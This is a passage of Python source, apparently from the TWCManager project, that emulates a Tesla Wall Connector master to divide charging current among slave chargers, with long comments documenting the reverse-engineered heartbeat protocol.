        self.TWCID = TWCID
        self.maxAmps = maxAmps
    def print_status(self, heartbeatData):
        """Print a one-line debug summary of this slave's heartbeat and our
        master heartbeat, suppressing near-duplicate output.

        heartbeatData: 7 (protocol 1) or 9 (protocol 2) bytes from the slave.
        """
        global fakeMaster, masterTWCID

        try:
            # Slave heartbeat: state byte, actual amps / max amps, trailing bytes.
            debugOutput = ": SHB %02X%02X: %02X %05.2f/%05.2fA %02X%02X" % \
                (self.TWCID[0], self.TWCID[1], heartbeatData[0],
                 (((heartbeatData[3] << 8) + heartbeatData[4]) / 100),
                 (((heartbeatData[1] << 8) + heartbeatData[2]) / 100),
                 heartbeatData[5], heartbeatData[6]
                )
            if(self.protocolVersion == 2):
                debugOutput += (" %02X%02X" % (heartbeatData[7], heartbeatData[8]))
            debugOutput += " M"

            if(not fakeMaster):
                debugOutput += " %02X%02X" % (masterTWCID[0], masterTWCID[1])

            # Master heartbeat: command byte, max amps offered, plug state, etc.
            debugOutput += ": %02X %05.2f/%05.2fA %02X%02X" % \
                (self.masterHeartbeatData[0],
                 (((self.masterHeartbeatData[3] << 8) + self.masterHeartbeatData[4]) / 100),
                 (((self.masterHeartbeatData[1] << 8) + self.masterHeartbeatData[2]) / 100),
                 self.masterHeartbeatData[5], self.masterHeartbeatData[6])
            if(self.protocolVersion == 2):
                debugOutput += (" %02X%02X" %
                    (self.masterHeartbeatData[7], self.masterHeartbeatData[8]))

            # Only output once-per-second heartbeat debug info when it's
            # different from the last output or if the only change has been amps
            # in use and it's only changed by 1.0 or less. Also output if it's
            # been 10 mins since the last output or if debugLevel is turned up
            # to 11.
            lastAmpsUsed = 0
            ampsUsed = 1
            debugOutputCompare = debugOutput
            m1 = re.search(r'SHB ....: .. (..\...)/', self.lastHeartbeatDebugOutput)
            if(m1):
                lastAmpsUsed = float(m1.group(1))
            m2 = re.search(r'SHB ....: .. (..\...)/', debugOutput)
            if(m2):
                ampsUsed = float(m2.group(1))
                if(m1):
                    # Splice last output's amps-used field into the new output
                    # so the comparison below ignores amps-used differences.
                    debugOutputCompare = debugOutputCompare[0:m2.start(1)] + \
                        self.lastHeartbeatDebugOutput[m1.start(1):m1.end(1)] + \
                        debugOutputCompare[m2.end(1):]
            if(
                debugOutputCompare != self.lastHeartbeatDebugOutput
                or abs(ampsUsed - lastAmpsUsed) >= 1.0
                or time.time() - self.timeLastHeartbeatDebugOutput > 600
                or debugLevel >= 11
            ):
                print(time_now() + debugOutput)
                self.lastHeartbeatDebugOutput = debugOutput
                self.timeLastHeartbeatDebugOutput = time.time()
        except IndexError:
            # This happens if we try to access, say, heartbeatData[8] when
            # len(heartbeatData) < 9. This was happening due to a bug I fixed
            # but I may as well leave this here just in case.
            # NOTE(review): 'msg' below is a module-level global holding the
            # last RS485 message received — confirm it is always set before
            # this method can run.
            if(len(heartbeatData) != (7 if self.protocolVersion == 1 else 9)):
                print(time_now() + ': Error in print_status displaying heartbeatData',
                      heartbeatData, 'based on msg', hex_str(msg))
            if(len(self.masterHeartbeatData) != (7 if self.protocolVersion == 1 else 9)):
                print(time_now() + ': Error in print_status displaying masterHeartbeatData', self.masterHeartbeatData)
    def send_slave_heartbeat(self, masterID):
        """Send our fake slave's heartbeat (slaveHeartbeatData) to the real
        master TWC identified by *masterID*, trimming/padding the payload to
        the length this protocol version expects.
        """
        # Send slave heartbeat
        #
        # Heartbeat includes data we store in slaveHeartbeatData.
        # Meaning of data:
        #
        # Byte 1 is a state code:
        #   00 Ready
        #      Car may or may not be plugged in.
        #      When car has reached its charge target, I've repeatedly seen it
        #      change from 03 to 00 the moment I wake the car using the phone app.
        #   01 Plugged in, charging
        #   02 Error
        #      This indicates an error such as not getting a heartbeat message
        #      from Master for too long.
        #   03 Plugged in, do not charge
        #      I've seen this state briefly when plug is first inserted, and
        #      I've seen this state remain indefinitely after pressing stop
        #      charge on car's screen or when the car reaches its target charge
        #      percentage. Unfortunately, this state does not reliably remain
        #      set, so I don't think it can be used to tell when a car is done
        #      charging. It may also remain indefinitely if TWCManager script is
        #      stopped for too long while car is charging even after TWCManager
        #      is restarted. In that case, car will not charge even when start
        #      charge on screen is pressed - only re-plugging in charge cable
        #      fixes it.
        #   04 Plugged in, ready to charge or charge scheduled
        #      I've seen this state even when car is set to charge at a future
        #      time via its UI. In that case, it won't accept power offered to
        #      it.
        #   05 Busy?
        #      I've only seen it hit this state for 1 second at a time and it
        #      can seemingly happen during any other state. Maybe it means wait,
        #      I'm busy? Communicating with car?
        #   08 Starting to charge?
        #      This state may remain for a few seconds while car ramps up from
        #      0A to 1.3A, then state usually changes to 01. Sometimes car skips
        #      08 and goes directly to 01.
        #      I saw 08 consistently each time I stopped fake master script with
        #      car scheduled to charge, plugged in, charge port blue. If the car
        #      is actually charging and you stop TWCManager, after 20-30 seconds
        #      the charge port turns solid red, steering wheel display says
        #      "charge cable fault", and main screen says "check charger power".
        #      When TWCManager is started, it sees this 08 status again. If we
        #      start TWCManager and send the slave a new max power value, 08
        #      becomes 00 and car starts charging again.
        #
        #   Protocol 2 adds a number of other states:
        #   06, 07, 09
        #      These are each sent as a response to Master sending the
        #      corresponding state. Ie if Master sends 06, slave responds with
        #      06. See notes in send_master_heartbeat for meaning.
        #   0A Amp adjustment period complete
        #      Master uses state 06 and 07 to raise or lower the slave by 2A
        #      temporarily. When that temporary period is over, it changes
        #      state to 0A.
        #   0F was reported by another user but I've not seen it during testing
        #      and have no idea what it means.
        #
        # Byte 2-3 is the max current available as provided by bytes 2-3 in our
        # fake master status.
        # For example, if bytes 2-3 are 0F A0, combine them as 0x0fa0 hex which
        # is 4000 in base 10. Move the decimal point two places left and you get
        # 40.00Amps max.
        #
        # Byte 4-5 represents the power the car is actually drawing for
        # charging. When a car is told to charge at 19A you may see a value like
        # 07 28 which is 0x728 hex or 1832 in base 10. Move the decimal point
        # two places left and you see the charger is using 18.32A.
        # Some TWCs report 0A when a car is not charging while others may report
        # small values such as 0.25A. I suspect 0A is what should be reported
        # and any small value indicates a minor calibration error.
        #
        # Remaining bytes are always 00 00 from what I've seen and could be
        # reserved for future use or may be used in a situation I've not
        # observed. Protocol 1 uses two zero bytes while protocol 2 uses four.
        ###############################
        # How was the above determined?
        #
        # An unplugged slave sends a status like this:
        #   00 00 00 00 19 00 00
        #
        # A real master always sends all 00 status data to a slave reporting the
        # above status. slaveHeartbeatData[0] is the main driver of how master
        # responds, but whether slaveHeartbeatData[1] and [2] have 00 or non-00
        # values also matters.
        #
        # I did a test with a protocol 1 TWC with fake slave sending
        # slaveHeartbeatData[0] values from 00 to ff along with
        # slaveHeartbeatData[1-2] of 00 and whatever
        # value Master last responded with. I found:
        #   Slave sends:   04 00 00 00 19 00 00
        #   Master responds: 05 12 c0 00 00 00 00
        #
        #   Slave sends:   04 12 c0 00 19 00 00
        #   Master responds: 00 00 00 00 00 00 00
        #
        #   Slave sends:   08 00 00 00 19 00 00
        #   Master responds: 08 12 c0 00 00 00 00
        #
        #   Slave sends:   08 12 c0 00 19 00 00
        #   Master responds: 00 00 00 00 00 00 00
        #
        # In other words, master always sends all 00 unless slave sends
        # slaveHeartbeatData[0] 04 or 08 with slaveHeartbeatData[1-2] both 00.
        #
        # I interpret all this to mean that when slave sends
        # slaveHeartbeatData[1-2] both 00, it's requesting a max power from
        # master. Master responds by telling the slave how much power it can
        # use. Once the slave is saying how much max power it's going to use
        # (slaveHeartbeatData[1-2] = 12 c0 = 32.00A), master indicates that's
        # fine by sending 00 00.
        #
        # However, if the master wants to set a lower limit on the slave, all it
        # has to do is send any heartbeatData[1-2] value greater than 00 00 at
        # any time and slave will respond by setting its
        # slaveHeartbeatData[1-2] to the same value.
        #
        # I thought slave might be able to negotiate a lower value if, say, the
        # car reported 40A was its max capability or if the slave itself could
        # only handle 80A, but the slave dutifully responds with the same value
        # master sends it even if that value is an insane 655.35A. I tested
        # these values on car which has a 40A limit when AC charging and
        # slave accepts them all:
        #   0f aa (40.10A)
        #   1f 40 (80.00A)
        #   1f 41 (80.01A)
        #   ff ff (655.35A)
        global fakeTWCID, slaveHeartbeatData, overrideMasterHeartbeatData

        if(self.protocolVersion == 1 and len(slaveHeartbeatData) > 7):
            # Cut array down to length 7
            slaveHeartbeatData = slaveHeartbeatData[0:7]
        elif(self.protocolVersion == 2):
            while(len(slaveHeartbeatData) < 9):
                # Increase array length to 9
                slaveHeartbeatData.append(0x00)

        # FD E0 is the slave-heartbeat message type, followed by our fake
        # slave's ID, the destination master's ID, and the payload.
        send_msg(bytearray(b'\xFD\xE0') + fakeTWCID + bytearray(masterID) + bytearray(slaveHeartbeatData))
    def send_master_heartbeat(self):
        """Send our fake master's heartbeat to this TWCSlave, and (protocol 2
        only) queue car API charge start/stop commands based on the amps we
        offered versus the amps the slave reports the car actually drawing.
        """
        # Send our fake master's heartbeat to this TWCSlave.
        #
        # Heartbeat includes 7 bytes (Protocol 1) or 9 bytes (Protocol 2) of data
        # that we store in masterHeartbeatData.
        # Meaning of data:
        #
        # Byte 1 is a command:
        #   00 Make no changes
        #   02 Error
        #     Byte 2 appears to act as a bitmap where each set bit causes the
        #     slave TWC to enter a different error state. First 8 digits below
        #     show which bits are set and these values were tested on a Protocol
        #     2 TWC:
        #       0000 0001 = Middle LED blinks 3 times red, top LED solid green.
        #                   Manual says this code means 'Incorrect rotary switch
        #                   setting.'
        #       0000 0010 = Middle LED blinks 5 times red, top LED solid green.
        #                   Manual says this code means 'More than three Wall
        #                   Connectors are set to Slave.'
        #       0000 0100 = Middle LED blinks 6 times red, top LED solid green.
        #                   Manual says this code means 'The networked Wall
        #                   Connectors have different maximum current
        #                   capabilities.'
        #       0000 1000 = No effect
        #       0001 0000 = No effect
        #       0010 0000 = No effect
        #       0100 0000 = No effect
        #       1000 0000 = No effect
        #     When two bits are set, the lowest bit (rightmost bit) seems to
        #     take precedence (ie 111 results in 3 blinks, 110 results in 5
        #     blinks).
        #
        #     If you send 02 to a slave TWC with an error code that triggers
        #     the middle LED to blink red, slave responds with 02 in its
        #     heartbeat, then stops sending heartbeat and refuses further
        #     communication. Slave's error state can be cleared by holding red
        #     reset button on its left side for about 4 seconds.
        #     If you send an error code with bitmap 11110xxx (where x is any bit),
        #     the error can not be cleared with a 4-second reset. Instead, you
        #     must power cycle the TWC or 'reboot' reset which means holding
        #     reset for about 6 seconds till all the LEDs turn green.
        #   05 Tell slave charger to limit power to number of amps in bytes 2-3.
        #
        # Protocol 2 adds a few more command codes:
        #   06 Increase charge current by 2 amps. Slave changes its heartbeat
        #      state to 06 in response. After 44 seconds, slave state changes to
        #      0A but amp value doesn't change. This state seems to be used to
        #      safely creep up the amp value of a slave when the Master has extra
        #      power to distribute. If a slave is attached to a car that doesn't
        #      want that many amps, Master will see the car isn't accepting the
        #      amps and stop offering more. It's possible the 0A state change
        #      is not time based but rather indicates something like the car is
        #      now using as many amps as it's going to use.
        #   07 Lower charge current by 2 amps. Slave changes its heartbeat state
        #      to 07 in response. After 10 seconds, slave raises its amp setting
        #      back up by 2A and changes state to 0A.
        #      I could be wrong, but when a real car doesn't want the higher amp
        #      value, I think the TWC doesn't raise by 2A after 10 seconds. Real
        #      Master TWCs seem to send 07 state to all children periodically as
        #      if to check if they're willing to accept lower amp values. If
        #      they do, Master assigns those amps to a different slave using the
        #      06 state.
        #   08 Master acknowledges that slave stopped charging (I think), but
        #      the next two bytes contain an amp value the slave could be using.
        #   09 Tell slave charger to limit power to number of amps in bytes 2-3.
        #      This command replaces the 05 command in Protocol 1. However, 05
        #      continues to be used, but only to set an amp value to be used
        #      before a car starts charging. If 05 is sent after a car is
        #      already charging, it is ignored.
        #
        # Byte 2-3 is the max current a slave TWC can charge at in command codes
        # 05, 08, and 09. In command code 02, byte 2 is a bitmap. With other
        # command codes, bytes 2-3 are ignored.
        # If bytes 2-3 are an amp value of 0F A0, combine them as 0x0fa0 hex
        # which is 4000 in base 10. Move the decimal point two places left and
        # you get 40.00Amps max.
        #
        # Byte 4: 01 when a Master TWC is physically plugged in to a car.
        # Otherwise 00.
        #
        # Remaining bytes are always 00.
        #
        # Example 7-byte data that real masters have sent in Protocol 1:
        #   00 00 00 00 00 00 00  (Idle)
        #   02 04 00 00 00 00 00  (Error bitmap 04. This happened when I
        #                         advertised a fake Master using an invalid max
        #                         amp value)
        #   05 0f a0 00 00 00 00  (Master telling slave to limit power to 0f a0
        #                         (40.00A))
        #   05 07 d0 01 00 00 00  (Master plugged in to a car and presumably
        #                         telling slaves to limit power to 07 d0
        #                         (20.00A). 01 byte indicates Master is plugged
        #                         in to a car.)
        global fakeTWCID, overrideMasterHeartbeatData, debugLevel, \
               timeLastTx, carApiVehicles

        if(len(overrideMasterHeartbeatData) >= 7):
            self.masterHeartbeatData = overrideMasterHeartbeatData

        if(self.protocolVersion == 2):
            # TODO: Start and stop charging using protocol 2 commands to TWC
            # instead of car api if I ever figure out how.
            if(self.lastAmpsOffered == 0 and self.reportedAmpsActual > 4.0):
                # Car is trying to charge, so stop it via car API.
                # car_api_charge() will prevent telling the car to start or stop
                # more than once per minute. Once the car gets the message to
                # stop, reportedAmpsActualSignificantChangeMonitor should drop
                # to near zero within a few seconds.
                # WARNING: If you own two vehicles and one is charging at home but
                # the other is charging away from home, this command will stop
                # them both from charging. If the away vehicle is not currently
                # charging, I'm not sure if this would prevent it from charging
                # when next plugged in.
                queue_background_task({'cmd':'charge', 'charge':False})
            elif(self.lastAmpsOffered >= 5.0 and self.reportedAmpsActual < 2.0
                 and self.reportedState != 0x02
            ):
                # Car is not charging and is not reporting an error state, so
                # try starting charge via car api.
                queue_background_task({'cmd':'charge', 'charge':True})
            elif(self.reportedAmpsActual > 4.0):
                # At least one plugged in car is successfully charging. We don't
                # know which car it is, so we must set
                # vehicle.stopAskingToStartCharging = False on all vehicles such
                # that if any vehicle is not charging without us calling
                # car_api_charge(False), we'll try to start it charging again at
                # least once. This probably isn't necessary but might prevent
                # some unexpected case from never starting a charge. It also
                # seems less confusing to see in the output that we always try
                # to start API charging after the car stops taking a charge.
                for vehicle in carApiVehicles:
                    vehicle.stopAskingToStartCharging = False

        # FB E0 is the master-heartbeat message type, followed by our fake
        # master's ID, this slave's ID, and the heartbeat payload.
        send_msg(bytearray(b'\xFB\xE0') + fakeTWCID + bytearray(self.TWCID)
                 + bytearray(self.masterHeartbeatData))
def receive_slave_heartbeat(self, heartbeatData):
    """Handle a heartbeat message received from a real slave TWC.

    Decodes the slave's state and amp readings from heartbeatData, decides
    how many amps to offer this slave (honoring chargeNow overrides,
    scheduled/non-scheduled amp limits, and green energy tracking), clamps
    the result for wiring safety via set_last_amps_offered(), and builds
    self.masterHeartbeatData, the reply payload sent back to the slave.

    heartbeatData byte layout (as used below):
      [0]    slave state code
      [1-2]  big-endian max amps the slave allows, in hundredths of an amp
      [3-4]  big-endian amps the car is actually drawing, in hundredths
    """
    global debugLevel, nonScheduledAmpsMax, \
           maxAmpsToDivideAmongSlaves, wiringMaxAmpsAllTWCs, \
           timeLastGreenEnergyCheck, greenEnergyAmpsOffset, \
           slaveTWCRoundRobin, spikeAmpsToCancel6ALimit, \
           chargeNowAmps, chargeNowTimeEnd, minAmpsPerTWC

    now = time.time()
    self.timeLastRx = now

    # Amp fields are 16-bit big-endian values in hundredths of an amp.
    self.reportedAmpsMax = ((heartbeatData[1] << 8) + heartbeatData[2]) / 100
    self.reportedAmpsActual = ((heartbeatData[3] << 8) + heartbeatData[4]) / 100
    self.reportedState = heartbeatData[0]

    # self.lastAmpsOffered is initialized to -1.
    # If we find it at that value, set it to the current value reported by the
    # TWC.
    if(self.lastAmpsOffered < 0):
        self.lastAmpsOffered = self.reportedAmpsMax

    # Keep track of the amps the slave is actually using and the last time it
    # changed by more than 0.8A.
    # Also update self.reportedAmpsActualSignificantChangeMonitor if it's
    # still set to its initial value of -1.
    if(self.reportedAmpsActualSignificantChangeMonitor < 0
       or abs(self.reportedAmpsActual - self.reportedAmpsActualSignificantChangeMonitor) > 0.8
    ):
        self.timeReportedAmpsActualChangedSignificantly = now
        self.reportedAmpsActualSignificantChangeMonitor = self.reportedAmpsActual

    ltNow = time.localtime()
    hourNow = ltNow.tm_hour + (ltNow.tm_min / 60)
    yesterday = ltNow.tm_wday - 1
    if(yesterday < 0):
        yesterday += 7

    # Check if it's time to resume tracking green energy.
    if(nonScheduledAmpsMax != -1 and hourResumeTrackGreenEnergy > -1
       and hourResumeTrackGreenEnergy == hourNow
    ):
        nonScheduledAmpsMax = -1
        save_settings()

    # Check if we're within the hours we must use scheduledAmpsMax instead
    # of nonScheduledAmpsMax
    blnUseScheduledAmps = 0
    if(scheduledAmpsMax > 0
       and
       scheduledAmpsStartHour > -1
       and
       scheduledAmpsEndHour > -1
       and
       scheduledAmpsDaysBitmap > 0
    ):
        if(scheduledAmpsStartHour > scheduledAmpsEndHour):
            # We have a time like 8am to 7am which we must interpret as the
            # 23-hour period after 8am or before 7am. Since this case always
            # crosses midnight, we only ensure that scheduledAmpsDaysBitmap
            # is set for the day the period starts on. For example, if
            # scheduledAmpsDaysBitmap says only schedule on Monday, 8am to
            # 7am, we apply scheduledAmpsMax from Monday at 8am to Monday at
            # 11:59pm, and on Tuesday at 12am to Tuesday at 6:59am.
            if(
                (
                    hourNow >= scheduledAmpsStartHour
                    and
                    (scheduledAmpsDaysBitmap & (1 << ltNow.tm_wday))
                )
                or
                (
                    hourNow < scheduledAmpsEndHour
                    and
                    (scheduledAmpsDaysBitmap & (1 << yesterday))
                )
            ):
                blnUseScheduledAmps = 1
        else:
            # We have a time like 7am to 8am which we must interpret as the
            # 1-hour period between 7am and 8am.
            if(hourNow >= scheduledAmpsStartHour
               and hourNow < scheduledAmpsEndHour
               and (scheduledAmpsDaysBitmap & (1 << ltNow.tm_wday))
            ):
                blnUseScheduledAmps = 1

    if(chargeNowTimeEnd > 0 and chargeNowTimeEnd < now):
        # We're beyond the one-day period where we want to charge at
        # chargeNowAmps, so reset the chargeNow variables.
        chargeNowAmps = 0
        chargeNowTimeEnd = 0

    if(chargeNowTimeEnd > 0 and chargeNowAmps > 0):
        # We're still in the one-day period where we want to charge at
        # chargeNowAmps, ignoring all other charging criteria.
        maxAmpsToDivideAmongSlaves = chargeNowAmps
        if(debugLevel >= 10):
            print(time_now() + ': Charge at chargeNowAmps %.2f' % (chargeNowAmps))
    elif(blnUseScheduledAmps):
        # We're within the scheduled hours that we need to provide a set
        # number of amps.
        maxAmpsToDivideAmongSlaves = scheduledAmpsMax
    else:
        if(nonScheduledAmpsMax > -1):
            maxAmpsToDivideAmongSlaves = nonScheduledAmpsMax
        elif(now - timeLastGreenEnergyCheck > 60):
            timeLastGreenEnergyCheck = now

            # Don't bother to check solar generation before 6am or after
            # 8pm. Sunrise in most U.S. areas varies from a little before
            # 6am in Jun to almost 7:30am in Nov before the clocks get set
            # back an hour. Sunset can be ~4:30pm to just after 8pm.
            if(ltNow.tm_hour < 6 or ltNow.tm_hour >= 20):
                maxAmpsToDivideAmongSlaves = 0
            else:
                queue_background_task({'cmd':'checkGreenEnergy'})

    # Use backgroundTasksLock to prevent the background thread from changing
    # the value of maxAmpsToDivideAmongSlaves after we've checked the value
    # is safe to use but before we've used it.
    backgroundTasksLock.acquire()

    if(maxAmpsToDivideAmongSlaves > wiringMaxAmpsAllTWCs):
        # Never tell the slaves to draw more amps than the physical charger
        # wiring can handle.
        if(debugLevel >= 1):
            print(time_now() +
                  " ERROR: maxAmpsToDivideAmongSlaves " + str(maxAmpsToDivideAmongSlaves) +
                  " > wiringMaxAmpsAllTWCs " + str(wiringMaxAmpsAllTWCs) +
                  ".\nSee notes above wiringMaxAmpsAllTWCs in the 'Configuration parameters' section.")
        maxAmpsToDivideAmongSlaves = wiringMaxAmpsAllTWCs

    # Determine how many cars are charging and how many amps they're using
    numCarsCharging = 1
    desiredAmpsOffered = maxAmpsToDivideAmongSlaves
    for slaveTWC in slaveTWCRoundRobin:
        if(slaveTWC.TWCID != self.TWCID):
            # To avoid exceeding maxAmpsToDivideAmongSlaves, we must
            # subtract the actual amps being used by this TWC from the amps
            # we will offer.
            desiredAmpsOffered -= slaveTWC.reportedAmpsActual

            if(slaveTWC.reportedAmpsActual >= 1.0):
                numCarsCharging += 1

    # Allocate this slave a fraction of maxAmpsToDivideAmongSlaves divided
    # by the number of cars actually charging.
    fairShareAmps = int(maxAmpsToDivideAmongSlaves / numCarsCharging)
    if(desiredAmpsOffered > fairShareAmps):
        desiredAmpsOffered = fairShareAmps
        if(debugLevel >= 10):
            print("desiredAmpsOffered reduced from " + str(maxAmpsToDivideAmongSlaves)
                  + " to " + str(desiredAmpsOffered)
                  + " with " + str(numCarsCharging)
                  + " cars charging.")

    backgroundTasksLock.release()

    minAmpsToOffer = minAmpsPerTWC
    if(self.minAmpsTWCSupports > minAmpsToOffer):
        minAmpsToOffer = self.minAmpsTWCSupports

    if(desiredAmpsOffered < minAmpsToOffer):
        if(maxAmpsToDivideAmongSlaves / numCarsCharging > minAmpsToOffer):
            # There is enough power available to give each car
            # minAmpsToOffer, but currently-charging cars are leaving us
            # less power than minAmpsToOffer to give this car.
            #
            # minAmpsToOffer is based on minAmpsPerTWC which is
            # user-configurable, whereas self.minAmpsTWCSupports is based on
            # the minimum amps TWC must be set to reliably start a car
            # charging.
            #
            # Unfortunately, we can't tell if a car is plugged in or wanting
            # to charge without offering it minAmpsTWCSupports. As the car
            # gradually starts to charge, we will see it using power and
            # tell other TWCs on the network to use less power. This could
            # cause the sum of power used by all TWCs to exceed
            # wiringMaxAmpsAllTWCs for a few seconds, but I don't think
            # exceeding by up to minAmpsTWCSupports for such a short period
            # of time will cause problems.
            if(debugLevel >= 10):
                print("desiredAmpsOffered increased from " + str(desiredAmpsOffered)
                      + " to " + str(self.minAmpsTWCSupports)
                      + " (self.minAmpsTWCSupports)")
            desiredAmpsOffered = self.minAmpsTWCSupports
        else:
            # There is not enough power available to give each car
            # minAmpsToOffer, so don't offer power to any cars. Alternately,
            # we could charge one car at a time and switch cars
            # periodically, but I'm not going to try to implement that.
            #
            # Note that 5A is the lowest value you can set using the Tesla car's
            # main screen, so lower values might have some adverse effect on the
            # car. I actually tried lower values when the sun was providing
            # under 5A of power and found the car would occasionally set itself
            # to state 03 and refuse to charge until you re-plugged the charger
            # cable. Clicking "Start charging" in the car's UI or in the phone
            # app would not start charging.
            #
            # A 5A charge only delivers ~3 miles of range to the car per hour,
            # but it forces the car to remain "on" at a level that it wastes
            # some power while it's charging. The lower the amps, the more power
            # is wasted. This is another reason not to go below 5A.
            #
            # So if there isn't at least 5A of power available, pass 0A as the
            # desired value. This tells the car to stop charging and it will
            # enter state 03 and go to sleep. You will hear the power relay in
            # the TWC turn off. When desiredAmpsOffered trends above 6A again,
            # it tells the car there's power.
            # If a car is set to energy saver mode in the car's UI, the car
            # seems to wake every 15 mins or so (unlocking or using phone app
            # also wakes it) and next time it wakes, it will see there's power
            # and start charging. Without energy saver mode, the car should
            # begin charging within about 10 seconds of changing this value.
            if(debugLevel >= 10):
                print("desiredAmpsOffered reduced to 0 from " + str(desiredAmpsOffered)
                      + " because maxAmpsToDivideAmongSlaves "
                      + str(maxAmpsToDivideAmongSlaves)
                      + " / numCarsCharging " + str(numCarsCharging)
                      + " < minAmpsToOffer " + str(minAmpsToOffer))
            desiredAmpsOffered = 0

        if(
            self.lastAmpsOffered > 0
            and
            (
                now - self.timeLastAmpsOfferedChanged < 60
                or
                now - self.timeReportedAmpsActualChangedSignificantly < 60
                or
                self.reportedAmpsActual < 4.0
            )
        ):
            # We were previously telling the car to charge but now we want
            # to tell it to stop. However, it's been less than a minute
            # since we told it to charge or since the last significant
            # change in the car's actual power draw or the car has not yet
            # started to draw at least 5 amps (telling it 5A makes it
            # actually draw around 4.18-4.27A so we check for
            # self.reportedAmpsActual < 4.0).
            #
            # Once we tell the car to charge, we want to keep it going for
            # at least a minute before turning it off again. The concern is
            # that yanking the power at just the wrong time during the
            # start-charge negotiation could put the car into an error state
            # where it won't charge again without being re-plugged. This
            # concern is hypothetical and most likely could not happen to a
            # real car, but I'd rather not take any chances with getting
            # someone's car into a non-charging state so they're stranded
            # when they need to get somewhere. Note that non-Tesla cars
            # using third-party adapters to plug in are at a higher risk of
            # encountering this sort of hypothetical problem.
            #
            # The other reason for this tactic is that in the minute we
            # wait, desiredAmpsOffered might rise above 5A in which case we
            # won't have to turn off the charger power at all. Avoiding too
            # many on/off cycles preserves the life of the TWC's main power
            # relay and may also prevent errors in the car that might be
            # caused by turning its charging on and off too rapidly.
            #
            # Seeing self.reportedAmpsActual < 4.0 means the car hasn't
            # ramped up to whatever level we told it to charge at last time.
            # It may be asleep and take up to 15 minutes to wake up, see
            # there's power, and start charging.
            #
            # Unfortunately, self.reportedAmpsActual < 4.0 can also mean the
            # car is at its target charge level and may not accept power for
            # days until the battery drops below a certain level. I can't
            # think of a reliable way to detect this case. When the car
            # stops itself from charging, we'll see self.reportedAmpsActual
            # drop to near 0.0A and heartbeatData[0] becomes 03, but we can
            # see the same 03 state when we tell the TWC to stop charging.
            # We could record the time the car stopped taking power and
            # assume it won't want more for some period of time, but we
            # can't reliably detect if someone unplugged the car, drove it,
            # and re-plugged it so it now needs power, or if someone plugged
            # in a different car that needs power. Even if I see the car
            # hasn't taken the power we've offered for the
            # last hour, it's conceivable the car will reach a battery state
            # where it decides it wants power the moment we decide it's safe
            # to stop offering it. Thus, I think it's safest to always wait
            # until the car has taken 5A for a minute before cutting power
            # even if that means the car will charge for a minute when you
            # first plug it in after a trip even at a time when no power
            # should be available.
            #
            # One advantage of the above situation is that whenever you plug
            # the car in, unless no power has been available since you
            # unplugged, the charge port will turn green and start charging
            # for a minute. This lets the owner quickly see that TWCManager
            # is working properly each time they return home and plug in.
            if(debugLevel >= 10):
                print("Don't stop charging yet because: " +
                      'time - self.timeLastAmpsOfferedChanged ' +
                      str(int(now - self.timeLastAmpsOfferedChanged)) +
                      ' < 60 or time - self.timeReportedAmpsActualChangedSignificantly ' +
                      str(int(now - self.timeReportedAmpsActualChangedSignificantly)) +
                      ' < 60 or self.reportedAmpsActual ' + str(self.reportedAmpsActual) +
                      ' < 4')
            desiredAmpsOffered = minAmpsToOffer
    else:
        # We can tell the TWC how much power to use in 0.01A increments, but
        # the car will only alter its power in larger increments (somewhere
        # between 0.5 and 0.6A). The car seems to prefer being sent whole
        # amps and when asked to adjust between certain values like 12.6A
        # one second and 12.0A the next second, the car reduces its power
        # use to ~5.14-5.23A and refuses to go higher. So it seems best to
        # stick with whole amps.
        desiredAmpsOffered = int(desiredAmpsOffered)

        if(self.lastAmpsOffered == 0
           and now - self.timeLastAmpsOfferedChanged < 60
        ):
            # Keep charger off for at least 60 seconds before turning back
            # on. See reasoning above where I don't turn the charger off
            # till it's been on at least 60 seconds.
            if(debugLevel >= 10):
                print("Don't start charging yet because: " +
                      'self.lastAmpsOffered ' +
                      str(self.lastAmpsOffered) + " == 0 " +
                      'and time - self.timeLastAmpsOfferedChanged ' +
                      str(int(now - self.timeLastAmpsOfferedChanged)) +
                      " < 60")
            desiredAmpsOffered = self.lastAmpsOffered
        else:
            # Mid Oct 2017, Tesla pushed a firmware update to their cars
            # that seems to create the following bug:
            # If you raise desiredAmpsOffered AT ALL from the car's current
            # max amp limit, the car will drop its max amp limit to the 6A
            # setting (5.14-5.23A actual use as reported in
            # heartbeatData[2-3]). The odd fix to this problem is to tell
            # the car to raise to at least spikeAmpsToCancel6ALimit for 5 or
            # more seconds, then tell it to lower the limit to
            # desiredAmpsOffered. Even 0.01A less than
            # spikeAmpsToCancel6ALimit is not enough to cancel the 6A limit.
            #
            # I'm not sure how long we have to hold spikeAmpsToCancel6ALimit
            # but 3 seconds is definitely not enough but 5 seconds seems to
            # work. It doesn't seem to matter if the car actually hits
            # spikeAmpsToCancel6ALimit of power draw. In fact, the car is
            # slow enough to respond that even with 10s at 21A the most I've
            # seen it actually draw starting at 6A is 13A.
            if(debugLevel >= 10):
                print('desiredAmpsOffered=' + str(desiredAmpsOffered) +
                      ' spikeAmpsToCancel6ALimit=' + str(spikeAmpsToCancel6ALimit) +
                      ' self.lastAmpsOffered=' + str(self.lastAmpsOffered) +
                      ' self.reportedAmpsActual=' + str(self.reportedAmpsActual) +
                      ' now - self.timeReportedAmpsActualChangedSignificantly=' +
                      str(int(now - self.timeReportedAmpsActualChangedSignificantly)))

            if(
                # If we just moved from a lower amp limit to
                # a higher one less than spikeAmpsToCancel6ALimit.
                (
                    desiredAmpsOffered < spikeAmpsToCancel6ALimit
                    and
                    desiredAmpsOffered > self.lastAmpsOffered
                )
                or
                (
                    # ...or if we've been offering the car more amps than it's
                    # been using for at least 10 seconds, then we'll change the
                    # amps we're offering it. For some reason, the change in
                    # amps offered will get the car to up its amp draw.
                    #
                    # First, check that the car is drawing enough amps to be
                    # charging...
                    self.reportedAmpsActual > 2.0
                    and
                    # ...and car is charging at under spikeAmpsToCancel6ALimit.
                    # I think I've seen cars get stuck between spikeAmpsToCancel6ALimit
                    # and lastAmpsOffered, but more often a car will be limited
                    # to under lastAmpsOffered by its UI setting or by the
                    # charger hardware it has on board, and we don't want to
                    # keep reducing it to spikeAmpsToCancel6ALimit.
                    # If cars really are getting stuck above
                    # spikeAmpsToCancel6ALimit, I may need to implement a
                    # counter that tries spikeAmpsToCancel6ALimit only a
                    # certain number of times per hour.
                    (self.reportedAmpsActual <= spikeAmpsToCancel6ALimit)
                    and
                    # ...and car is charging at over two amps under what we
                    # want it to charge at. I have to use 2 amps because when
                    # offered, say 40A, the car charges at ~38.76A actual.
                    # Using a percentage instead of 2.0A doesn't work because
                    # 38.58/40 = 95.4% but 5.14/6 = 85.6%
                    (self.lastAmpsOffered - self.reportedAmpsActual) > 2.0
                    and
